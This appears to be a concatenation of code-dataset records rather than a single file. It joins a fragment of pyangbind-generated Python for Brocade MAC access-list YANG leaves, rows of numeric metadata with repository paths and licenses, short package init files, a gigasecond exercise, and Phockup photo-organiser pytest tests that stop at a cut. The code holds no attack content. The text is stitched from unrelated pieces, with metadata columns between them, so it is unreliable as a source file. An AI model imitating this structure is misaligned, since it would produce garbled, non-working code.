    do so via calling thisObj._set_src_mac_addr_mask() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="src-mac-addr-mask", rest_name="src-mac-addr-mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='src-dst-mac-address-mask-type', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """src_mac_addr_mask must be of a type compatible with src-dst-mac-address-mask-type""",
          'defined-type': "brocade-mac-access-list:src-dst-mac-address-mask-type",
          'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="src-mac-addr-mask", rest_name="src-mac-addr-mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='src-dst-mac-address-mask-type', is_config=True)""",
        })
    self.__src_mac_addr_mask = t
    if hasattr(self, '_set'):
      self._set()
  def _unset_src_mac_addr_mask(self):
    self.__src_mac_addr_mask = YANGDynClass(base=unicode, is_leaf=True, yang_name="src-mac-addr-mask", rest_name="src-mac-addr-mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='src-dst-mac-address-mask-type', is_config=True)
  def _get_count(self):
    """
    Getter method for count, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/count (empty)
    """
    return self.__count
  def _set_count(self, v, load=False):
    """
    Setter method for count, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/count (empty)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_count is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_count() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="count", rest_name="count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Packet count', u'cli-optional-in-sequence': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """count must be of a type compatible with empty""",
          'defined-type': "empty",
          'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="count", rest_name="count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Packet count', u'cli-optional-in-sequence': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)""",
        })
    self.__count = t
    if hasattr(self, '_set'):
      self._set()
  def _unset_count(self):
    self.__count = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="count", rest_name="count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Packet count', u'cli-optional-in-sequence': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)
  def _get_log(self):
    """
    Getter method for log, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/log (empty)
    """
    return self.__log
  def _set_log(self, v, load=False):
    """
    Setter method for log, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/log (empty)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_log is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_log() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="log", rest_name="log", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Log Packet', u'cli-optional-in-sequence': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """log must be of a type compatible with empty""",
          'defined-type': "empty",
          'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="log", rest_name="log", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Log Packet', u'cli-optional-in-sequence': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)""",
        })
    self.__log = t
    if hasattr(self, '_set'):
      self._set()
  def _unset_log(self):
    self.__log = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="log", rest_name="log", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Log Packet', u'cli-optional-in-sequence': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)
  def _get_copy_sflow(self):
    """
    Getter method for copy_sflow, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/copy_sflow (empty)
    """
    return self.__copy_sflow
  def _set_copy_sflow(self, v, load=False):
    """
    Setter method for copy_sflow, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/copy_sflow (empty)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_copy_sflow is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_copy_sflow() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="copy-sflow", rest_name="copy-sflow", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'cli-optional-in-sequence': None, u'hidden': u'full', u'info': u'Copy to sFlow Collector', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """copy_sflow must be of a type compatible with empty""",
          'defined-type': "empty",
          'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="copy-sflow", rest_name="copy-sflow", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'cli-optional-in-sequence': None, u'hidden': u'full', u'info': u'Copy to sFlow Collector', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)""",
        })
    self.__copy_sflow = t
    if hasattr(self, '_set'):
      self._set()
  def _unset_copy_sflow(self):
    self.__copy_sflow = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="copy-sflow", rest_name="copy-sflow", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'cli-optional-in-sequence': None, u'hidden': u'full', u'info': u'Copy to sFlow Collector', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)
  # Public attribute access for each leaf is routed through the generated
  # getter/setter pairs above via properties.
  seq_id = __builtin__.property(_get_seq_id, _set_seq_id)
  action = __builtin__.property(_get_action, _set_action)
  source = __builtin__.property(_get_source, _set_source)
  srchost = __builtin__.property(_get_srchost, _set_srchost)
  src_mac_addr_mask = __builtin__.property(_get_src_mac_addr_mask, _set_src_mac_addr_mask)
  count = __builtin__.property(_get_count, _set_count)
  log = __builtin__.property(_get_log, _set_log)
  copy_sflow = __builtin__.property(_get_copy_sflow, _set_copy_sflow)
  _pyangbind_elements = {'seq_id': seq_id, 'action': action, 'source': source, 'srchost': srchost, 'src_mac_addr_mask': src_mac_addr_mask, 'count': count, 'log': log, 'copy_sflow': copy_sflow, }
| 76.643432
| 698
| 0.711173
| 4,068
| 28,588
| 4.770895
| 0.053589
| 0.045342
| 0.057605
| 0.071105
| 0.868869
| 0.840478
| 0.828318
| 0.808172
| 0.807451
| 0.792354
| 0
| 0.007269
| 0.143382
| 28,588
| 372
| 699
| 76.849462
| 0.785251
| 0.141283
| 0
| 0.443966
| 0
| 0.034483
| 0.38721
| 0.191722
| 0
| 0
| 0
| 0
| 0
| 1
| 0.116379
| false
| 0
| 0.034483
| 0
| 0.267241
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
83a51432af726987a7a6708239cc18c18d05c2d6
| 49
|
py
|
Python
|
dexp/processing/isonet/__init__.py
|
haesleinhuepf/dexp
|
2ea84f3db323724588fac565fae56f0d522bc5ca
|
[
"BSD-3-Clause"
] | 16
|
2021-04-21T14:09:19.000Z
|
2022-03-22T02:30:59.000Z
|
dexp/processing/isonet/__init__.py
|
haesleinhuepf/dexp
|
2ea84f3db323724588fac565fae56f0d522bc5ca
|
[
"BSD-3-Clause"
] | 28
|
2021-04-15T17:43:08.000Z
|
2022-03-29T16:08:35.000Z
|
dexp/processing/isonet/__init__.py
|
haesleinhuepf/dexp
|
2ea84f3db323724588fac565fae56f0d522bc5ca
|
[
"BSD-3-Clause"
] | 3
|
2022-02-08T17:41:30.000Z
|
2022-03-18T15:32:27.000Z
|
from dexp.processing.isonet.isonet import IsoNet
| 24.5
| 48
| 0.857143
| 7
| 49
| 6
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 49
| 1
| 49
| 49
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
83ad153ed9b015a4de8d400f80196ebe8ba792df
| 94
|
py
|
Python
|
edge/model/safety_models/__init__.py
|
Data-Science-in-Mechanical-Engineering/edge
|
586eaba2f0957e75940f4f19fa774603f57eae89
|
[
"MIT"
] | null | null | null |
edge/model/safety_models/__init__.py
|
Data-Science-in-Mechanical-Engineering/edge
|
586eaba2f0957e75940f4f19fa774603f57eae89
|
[
"MIT"
] | null | null | null |
edge/model/safety_models/__init__.py
|
Data-Science-in-Mechanical-Engineering/edge
|
586eaba2f0957e75940f4f19fa774603f57eae89
|
[
"MIT"
] | null | null | null |
from .safety_measure import SafetyMeasure, MaternSafety
from .safety_truth import SafetyTruth
| 31.333333
| 55
| 0.87234
| 11
| 94
| 7.272727
| 0.727273
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095745
| 94
| 2
| 56
| 47
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
83fb5516f4dec5aec5ddfda0d79b5461ce77e908
| 981
|
py
|
Python
|
pyrandomtools/__init__.py
|
rickalm/pyrandomtools
|
29e0fce08894590d2c142acd19e42c6160974c85
|
[
"MIT"
] | null | null | null |
pyrandomtools/__init__.py
|
rickalm/pyrandomtools
|
29e0fce08894590d2c142acd19e42c6160974c85
|
[
"MIT"
] | null | null | null |
pyrandomtools/__init__.py
|
rickalm/pyrandomtools
|
29e0fce08894590d2c142acd19e42c6160974c85
|
[
"MIT"
] | null | null | null |
# I understand the python convention of __all__ to specify the list of subordinate functions
# to include from a module. I still choose this method of exposing individual functions
# from their various components as a way to document them and specify which component they are
# dervied.
#
# in addition any special handling for v2/3 can be addressed here as well
#
from pyrandomtools.aws_functions import parse_arn
from pyrandomtools.aws_functions import validate_region
from pyrandomtools.functions import name_of
from pyrandomtools.functions import str2bool
from pyrandomtools.functions import lcase_keys
from pyrandomtools.functions import firstValid
from pyrandomtools.functions import rangePick
from pyrandomtools.functions import treeGet
from pyrandomtools.functions import asList
from pyrandomtools.functions import listContains
from pyrandomtools.functions import validInt
from pyrandomtools.functions import validNumber
from pyrandomtools.functions import function_name
| 42.652174
| 94
| 0.85525
| 131
| 981
| 6.320611
| 0.51145
| 0.266908
| 0.345411
| 0.425121
| 0.084541
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00348
| 0.121305
| 981
| 22
| 95
| 44.590909
| 0.957077
| 0.356779
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
86042f538b684f9e4a88b3e539986ef01c67d3fe
| 25
|
py
|
Python
|
src/data/__init__.py
|
kurt-stolle/tue-cityscapes-segmentation
|
cdc8bdc749ac57f1b690cadc46d1d3ecbb48c886
|
[
"MIT"
] | null | null | null |
src/data/__init__.py
|
kurt-stolle/tue-cityscapes-segmentation
|
cdc8bdc749ac57f1b690cadc46d1d3ecbb48c886
|
[
"MIT"
] | null | null | null |
src/data/__init__.py
|
kurt-stolle/tue-cityscapes-segmentation
|
cdc8bdc749ac57f1b690cadc46d1d3ecbb48c886
|
[
"MIT"
] | null | null | null |
from .cityscapes import *
| 25
| 25
| 0.8
| 3
| 25
| 6.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 25
| 1
| 25
| 25
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f7bbbd5fefc7bb332d4252e899a1738cce87859a
| 130
|
py
|
Python
|
python/gigasecond/gigasecond.py
|
dvl/exercism.io-solutions
|
1eda73318bc0c568958df32f3b98d937f25a994f
|
[
"MIT"
] | 1
|
2016-02-01T02:23:28.000Z
|
2016-02-01T02:23:28.000Z
|
python/gigasecond/gigasecond.py
|
dvl/exercism.io-solutions
|
1eda73318bc0c568958df32f3b98d937f25a994f
|
[
"MIT"
] | null | null | null |
python/gigasecond/gigasecond.py
|
dvl/exercism.io-solutions
|
1eda73318bc0c568958df32f3b98d937f25a994f
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import datetime
def add_gigasecond(birthdate):
    """Return the moment exactly one gigasecond (10**9 seconds) after *birthdate*."""
    one_gigasecond = datetime.timedelta(seconds=10 ** 9)
    return birthdate + one_gigasecond
| 18.571429
| 56
| 0.707692
| 16
| 130
| 5.6875
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.036036
| 0.146154
| 130
| 7
| 56
| 18.571429
| 0.783784
| 0.161538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
7919c7d8043a7b0812046617111ef1c7cec1d37a
| 14,491
|
py
|
Python
|
tests/test_phockup.py
|
pabera/phockup
|
5698c5cb70f9a215b3c44198924d28558f432288
|
[
"MIT"
] | null | null | null |
tests/test_phockup.py
|
pabera/phockup
|
5698c5cb70f9a215b3c44198924d28558f432288
|
[
"MIT"
] | null | null | null |
tests/test_phockup.py
|
pabera/phockup
|
5698c5cb70f9a215b3c44198924d28558f432288
|
[
"MIT"
] | 2
|
2021-07-10T13:46:01.000Z
|
2021-08-06T03:27:13.000Z
|
#!/usr/bin/env python3
import pytest
import shutil
import sys
import os
import logging
from datetime import datetime
from src.dependency import check_dependencies
from src.exif import Exif
from src.phockup import Phockup
# Run the tests from the tests/ directory so the relative fixture paths
# ('input', 'output') used below resolve regardless of the pytest invocation dir.
os.chdir(os.path.dirname(__file__))
def test_check_dependencies(mocker):
    """check_dependencies succeeds (no sys.exit) when exiftool is found on PATH."""
    mocker.patch('shutil.which', return_value='exiftool')
    mocker.patch('sys.exit')
    check_dependencies()
    assert not sys.exit.called
def test_check_dependencies_missing(mocker):
    """check_dependencies raises when shutil.which cannot locate exiftool."""
    mocker.patch('shutil.which', return_value=None)
    mocker.patch('sys.exit')
    with pytest.raises(Exception, match="Exiftool is not installed. \
Visit http://www.sno.phy.queensu.ca/~phil/exiftool/"):
        check_dependencies()
def test_exception_if_missing_input_directory(mocker):
    """Phockup refuses to start when the input directory does not exist."""
    mocker.patch('os.makedirs')
    mocker.patch('sys.exit')
    with pytest.raises(RuntimeError, match="Input directory 'in' does not \
exist or cannot be accessed"):
        Phockup('in', 'out')
def test_removing_trailing_slash_for_input_output(mocker):
    """Trailing path separators (both POSIX and Windows styles) are stripped."""
    mocker.patch('os.makedirs')
    mocker.patch('sys.exit')
    mocker.patch.object(Phockup, 'check_directories')
    if sys.platform == 'win32':
        phockup = Phockup('in\\', 'out\\')
    else:
        phockup = Phockup('in/', 'out/')
    assert phockup.input_dir == 'in'
    assert phockup.output_dir == 'out'
def test_exception_for_no_write_access_when_creating_output_dir(mocker):
    """Creating the output dir in an unwritable location raises OSError.

    NOTE(review): relies on the test not running as root — TODO confirm CI setup.
    """
    mocker.patch.object(Phockup, 'walk_directory')
    with pytest.raises(OSError, match="Cannot create output '/root/phockup' \
directory. No write access!"):
        Phockup('input', '/root/phockup')
def test_walking_directory():
    """End-to-end run over the 'input' fixture tree: files land in the expected
    date directories (plus 'unknown') with the expected per-directory counts."""
    shutil.rmtree('output', ignore_errors=True)
    Phockup('input', 'output')
    dir1 = 'output/2017/01/01'
    dir2 = 'output/2017/10/06'
    dir3 = 'output/unknown'
    dir4 = 'output/2018/01/01/'
    assert os.path.isdir(dir1)
    assert os.path.isdir(dir2)
    assert os.path.isdir(dir3)
    assert os.path.isdir(dir4)
    assert len([name for name in os.listdir(dir1) if
                os.path.isfile(os.path.join(dir1, name))]) == 3
    assert len([name for name in os.listdir(dir2) if
                os.path.isfile(os.path.join(dir2, name))]) == 1
    assert len([name for name in os.listdir(dir3) if
                os.path.isfile(os.path.join(dir3, name))]) == 1
    assert len([name for name in os.listdir(dir4) if
                os.path.isfile(os.path.join(dir4, name))]) == 1
    shutil.rmtree('output', ignore_errors=True)
def test_dry_run():
    """With dry_run=True nothing at all is written to disk."""
    shutil.rmtree('output', ignore_errors=True)
    Phockup('input', 'output', dry_run=True)
    assert not os.path.isdir('output')
    dir1 = 'output/2017/01/01'
    dir2 = 'output/2017/10/06'
    dir3 = 'output/unknown'
    dir4 = 'output/2018/01/01/'
    assert not os.path.isdir(dir1)
    assert not os.path.isdir(dir2)
    assert not os.path.isdir(dir3)
    assert not os.path.isdir(dir4)
def test_get_file_type(mocker):
    """get_file_type is truthy for image/video MIME types and falsy otherwise."""
    mocker.patch.object(Phockup, 'check_directories')
    assert Phockup('in', '.').get_file_type("image/jpeg")
    assert Phockup('in', '.').get_file_type("video/mp4")
    assert not Phockup('in', '.').get_file_type("foo/bar")
def test_get_file_name(mocker):
    """Target name is YYYYMMDD-HHMMSS plus subseconds and the source extension."""
    mocker.patch.object(Phockup, 'check_directories')
    mocker.patch.object(Phockup, 'walk_directory')
    date = {
        "date": datetime(2017, 1, 1, 1, 1, 1),
        "subseconds": "20"
    }
    assert Phockup('in', 'out').get_file_name("Bar/Foo.jpg", date) == \
        "20170101-01010120.jpg"
def test_get_file_name_is_original_on_exception(mocker):
    """Without date info the original base name is kept unchanged."""
    mocker.patch.object(Phockup, 'check_directories')
    mocker.patch.object(Phockup, 'walk_directory')
    assert Phockup('in', 'out').get_file_name("Bar/Foo.jpg", None) == "Foo.jpg"
def test_process_file_with_filename_date(mocker):
    """When EXIF has no date (mocked to MIMEType only), the date embedded in
    the file name is used for sorting and renaming."""
    shutil.rmtree('output', ignore_errors=True)
    mocker.patch.object(Phockup, 'check_directories')
    mocker.patch.object(Phockup, 'walk_directory')
    mocker.patch.object(Exif, 'data')
    Exif.data.return_value = {
        "MIMEType": "image/jpeg"
    }
    Phockup('input', 'output').process_file("input/date_20170101_010101.jpg")
    assert os.path.isfile("output/2017/01/01/20170101-010101.jpg")
    shutil.rmtree('output', ignore_errors=True)
def test_process_link_to_file_with_filename_date(mocker):
    """A symlink to a dated file is processed like the target file itself."""
    shutil.rmtree('output', ignore_errors=True)
    mocker.patch.object(Phockup, 'check_directories')
    mocker.patch.object(Phockup, 'walk_directory')
    Phockup('input', 'output').process_file(
        "input/link_to_date_20170101_010101.jpg")
    assert os.path.isfile("output/2017/01/01/20170101-010101.jpg")
    shutil.rmtree('output', ignore_errors=True)
def test_process_broken_link(mocker, caplog):
    """A path that does not exist is skipped with a warning, not an error."""
    shutil.rmtree('output', ignore_errors=True)
    mocker.patch.object(Phockup, 'check_directories')
    mocker.patch.object(Phockup, 'walk_directory')
    with caplog.at_level(logging.WARNING):
        Phockup('input', 'output').process_file("input/not_a_file.jpg")
    assert 'skipped, no such file or directory' in caplog.text
    shutil.rmtree('output', ignore_errors=True)
def test_process_broken_link_move(mocker, caplog):
    """Missing file is also skipped with a warning when move=True.

    NOTE(review): the caplog block below creates a fresh non-move Phockup
    instead of reusing the move-enabled instance above — looks like a
    copy-paste remnant from test_process_broken_link; confirm intent.
    """
    shutil.rmtree('output', ignore_errors=True)
    mocker.patch.object(Phockup, 'check_directories')
    mocker.patch.object(Phockup, 'walk_directory')
    phockup = Phockup('input', 'output', move=True)
    phockup.process_file("input/not_a_file.jpg")
    with caplog.at_level(logging.WARNING):
        Phockup('input', 'output').process_file("input/not_a_file.jpg")
    assert 'skipped, no such file or directory' in caplog.text
    shutil.rmtree('output', ignore_errors=True)
def test_process_image_exif_date(mocker):
    """A file with a real EXIF date lands in the matching date directory."""
    shutil.rmtree('output', ignore_errors=True)
    mocker.patch.object(Phockup, 'check_directories')
    mocker.patch.object(Phockup, 'walk_directory')
    Phockup('input', 'output').process_file("input/exif.jpg")
    assert os.path.isfile("output/2017/01/01/20170101-010101.jpg")
    shutil.rmtree('output', ignore_errors=True)
def test_process_image_xmp(mocker):
    """An '<name>.jpg.xmp' sidecar is renamed and moved alongside its image."""
    shutil.rmtree('output', ignore_errors=True)
    mocker.patch.object(Phockup, 'check_directories')
    mocker.patch.object(Phockup, 'walk_directory')
    Phockup('input', 'output').process_file("input/xmp.jpg")
    assert os.path.isfile("output/2017/01/01/20170101-010101.jpg")
    assert os.path.isfile("output/2017/01/01/20170101-010101.jpg.xmp")
    shutil.rmtree('output', ignore_errors=True)
def test_process_image_xmp_noext(mocker):
    """An '<name>.xmp' sidecar (no image extension) is carried over too."""
    shutil.rmtree('output', ignore_errors=True)
    mocker.patch.object(Phockup, 'check_directories')
    mocker.patch.object(Phockup, 'walk_directory')
    Phockup('input', 'output').process_file("input/xmp_noext.jpg")
    assert os.path.isfile("output/2017/01/01/20170101-010101.jpg")
    assert os.path.isfile("output/2017/01/01/20170101-010101.xmp")
    shutil.rmtree('output', ignore_errors=True)
def test_process_image_xmp_ext_and_noext(mocker):
    """Both sidecar naming styles are carried over when both files exist."""
    shutil.rmtree('output', ignore_errors=True)
    mocker.patch.object(Phockup, 'check_directories')
    mocker.patch.object(Phockup, 'walk_directory')
    Phockup('input', 'output').process_file("input/xmp_ext.jpg")
    assert os.path.isfile("output/2017/01/01/20170101-010101.jpg")
    assert os.path.isfile("output/2017/01/01/20170101-010101.xmp")
    assert os.path.isfile("output/2017/01/01/20170101-010101.jpg.xmp")
    shutil.rmtree('output', ignore_errors=True)
def test_process_image_unknown(mocker):
    """A file with no usable date goes to output/unknown with its name lower-cased."""
    shutil.rmtree('output', ignore_errors=True)
    mocker.patch.object(Phockup, 'check_directories')
    mocker.patch.object(Phockup, 'walk_directory')
    mocker.patch.object(Exif, 'data')
    Exif.data.return_value = {
        "MIMEType": "image/jpeg"
    }
    Phockup('input', 'output').process_file("input/UNKNOWN.jpg")
    assert os.path.isfile("output/unknown/unknown.jpg")
    shutil.rmtree('output', ignore_errors=True)
def test_process_other(mocker):
    """Non-media files are filed under output/unknown."""
    shutil.rmtree('output', ignore_errors=True)
    mocker.patch.object(Phockup, 'check_directories')
    mocker.patch.object(Phockup, 'walk_directory')
    Phockup('input', 'output').process_file("input/other.txt")
    assert os.path.isfile("output/unknown/other.txt")
    shutil.rmtree('output', ignore_errors=True)
def test_process_move(mocker):
    """move=True relocates the image and its sidecar instead of copying them."""
    shutil.rmtree('output', ignore_errors=True)
    mocker.patch.object(Phockup, 'check_directories')
    mocker.patch.object(Phockup, 'walk_directory')
    mocker.patch.object(Exif, 'data')
    Exif.data.return_value = {
        "MIMEType": "image/jpeg"
    }
    phockup = Phockup('input', 'output', move=True)
    # create throw-away fixtures so the move can consume them
    open("input/tmp_20170101_010101.jpg", "w").close()
    open("input/tmp_20170101_010101.xmp", "w").close()
    phockup.process_file("input/tmp_20170101_010101.jpg")
    phockup.process_file("input/tmp_20170101_010101.xmp")
    assert not os.path.isfile("input/tmp_20170101_010101.jpg")
    assert not os.path.isfile("input/tmp_20170101_010101.xmp")
    assert os.path.isfile("output/2017/01/01/20170101-010101.jpg")
    assert os.path.isfile("output/2017/01/01/20170101-010101.xmp")
    shutil.rmtree('output', ignore_errors=True)
def test_process_link(mocker):
    """link=True keeps the originals in place while entries appear in output
    (presumably links — the test only checks existence on both sides)."""
    shutil.rmtree('output', ignore_errors=True)
    mocker.patch.object(Phockup, 'check_directories')
    mocker.patch.object(Phockup, 'walk_directory')
    mocker.patch.object(Exif, 'data')
    Exif.data.return_value = {
        "MIMEType": "image/jpeg"
    }
    phockup = Phockup('input', 'output', link=True)
    open("input/tmp_20170101_010101.jpg", "w").close()
    open("input/tmp_20170101_010101.xmp", "w").close()
    phockup.process_file("input/tmp_20170101_010101.jpg")
    phockup.process_file("input/tmp_20170101_010101.xmp")
    assert os.path.isfile("input/tmp_20170101_010101.jpg")
    assert os.path.isfile("input/tmp_20170101_010101.xmp")
    assert os.path.isfile("output/2017/01/01/20170101-010101.jpg")
    assert os.path.isfile("output/2017/01/01/20170101-010101.xmp")
    shutil.rmtree('output', ignore_errors=True)
    # unlike the move test, the originals remain and must be cleaned up here
    os.remove("input/tmp_20170101_010101.jpg")
    os.remove("input/tmp_20170101_010101.xmp")
def test_process_exists_same(mocker, caplog):
    """Re-processing an identical file logs a 'duplicated file' skip."""
    shutil.rmtree('output', ignore_errors=True)
    mocker.patch.object(Phockup, 'check_directories')
    mocker.patch.object(Phockup, 'walk_directory')
    phockup = Phockup('input', 'output')
    phockup.process_file("input/exif.jpg")
    assert os.path.isfile("output/2017/01/01/20170101-010101.jpg")
    with caplog.at_level(logging.INFO):
        phockup.process_file("input/exif.jpg")
    assert 'skipped, duplicated file' in caplog.text
    shutil.rmtree('output', ignore_errors=True)
def test_process_same_date_different_files_rename(mocker):
    """Different files resolving to the same timestamp get a '-2' suffix."""
    shutil.rmtree('output', ignore_errors=True)
    mocker.patch.object(Phockup, 'check_directories')
    mocker.patch.object(Phockup, 'walk_directory')
    phockup = Phockup('input', 'output')
    phockup.process_file("input/exif.jpg")
    # force the second (different) file to report the same creation date
    mocker.patch.object(Exif, 'data')
    Exif.data.return_value = {
        "MIMEType": "image/jpeg",
        "CreateDate": "2017:01:01 01:01:01"
    }
    phockup.process_file("input/date_20170101_010101.jpg")
    assert os.path.isfile("output/2017/01/01/20170101-010101-2.jpg")
    shutil.rmtree('output', ignore_errors=True)
def test_process_skip_xmp(mocker):
    """A stand-alone .xmp file is skipped outright (no output, no error)."""
    # Assume no errors == skip XMP file
    mocker.patch.object(Phockup, 'check_directories')
    mocker.patch.object(Phockup, 'walk_directory')
    phockup = Phockup('input', 'output')
    phockup.process_file("skip.xmp")
def test_process_skip_ignored_file():
